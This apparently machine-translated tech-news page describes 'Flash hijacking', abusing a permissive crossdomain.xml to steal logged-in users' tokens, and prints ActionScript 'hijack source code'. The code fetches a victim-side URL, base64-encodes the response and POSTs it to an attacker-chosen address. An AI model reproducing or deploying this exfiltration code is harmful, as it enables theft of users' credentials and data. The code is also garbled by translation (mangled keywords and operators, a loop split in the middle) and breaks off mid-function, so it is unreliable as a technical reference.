In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-01-15 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)06/01 Report--
What are the ways to detect whether flash is hijacked?
Iis7 website monitoring
Website hijacking, pollution, flash hijacking can be detected.
Flash hijacking
When we are digging src loopholes and find an interface or a page of response content, when there is a user's token or information uniquely identified by the user, we want to access the www..com/crossdomain.xml
In the above case, if you want to find someone on .com who can upload pictures, you can hijack the user's rights.
Hijack source code:
Package {
Import flash.display.Sprite
Import flash.events.Event
Import flash.net.
Import flash.utils.ByteArray
Import flash.text.TextField
Public class hijack extends Sprite
{
Private static const _ encodeChars:Vector. = _ initEncoreChar ()
Public function hijack ()
{
Var params:Object=root.loaderInfo.parameters
Var jpg:URLRequest = new URLRequest (params.jpg)
Jpg.method = URLRequestMethod.GET
SendToURL (jpg)
Var request:URLRequest = new URLRequest (params.get)
Request.method = URLRequestMethod.GET
Var loader:URLLoader=new URLLoader ()
Loader.addEventListener (Event.COMPLETE,completeHandler)
Function completeHandler (event:Event): void {
Var data:String= (loader.data)
Var postURLrequest:URLRequest = new URLRequest (params.post)
PostURLrequest.method = URLRequestMethod.POST
Var postdata:Object = new Array ()
Postdata [0] = encode (data)
PostURLrequest.data = postdata [0]
SendToURL (postURLrequest)
}
Loader.load (request)
}
Public static function encode (data:String): String {
Var bytes:ByteArray = new ByteArray ()
Bytes.writeUTFBytes (data)
Return encodeByteArray (bytes)
}
Public static function encodeByteArray (data:ByteArray): String {
Var out:ByteArray = new ByteArray ()
/ / Presetting the length keep the memory smaller and optimize speed since there is no "grow" needed
Out.length = (2 + data.length-((data.length + 2)% 3)) 4 / 3; / / Preset length / / 1.6 to 1.5 ms
Var i:int = 0
Var r:int = data.length 3
Var len:int = data.length-r
Var read (3) character AND write (4) characters
Var outPos:int = 0
While (I)
< len) { //Read 3 Characters (8bit * 3 = 24 bits) c = data[int(i++)] >18)]
Out [int (outPos++)] = _ encodeChars [int (c > 12 & 0x3f)]
Out [int (outPos++)] = _ encodeChars [int (c > 6 & 0x3f)]
Out [int (outPos++)] = _ encodeChars [int (c & 0x3f)]
}
/ / Need two "=" padding
If (r = = 1) {
/ / Read one char, write two chars, write padding
C = data [int (I)]
Out [int (outPos++)] = _ encodeCharts [int (c > 2)]
Out [int (outPos++)] = _ encodeChars [int ((c & 0x03) > 10)]
Out [int (outPos++)] = _ encodeChars [int (c > 4 & 0x3f)]
Out [int (outPos++)] = _ encodeChars [int ((c & 0x0f))
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.
12
Report
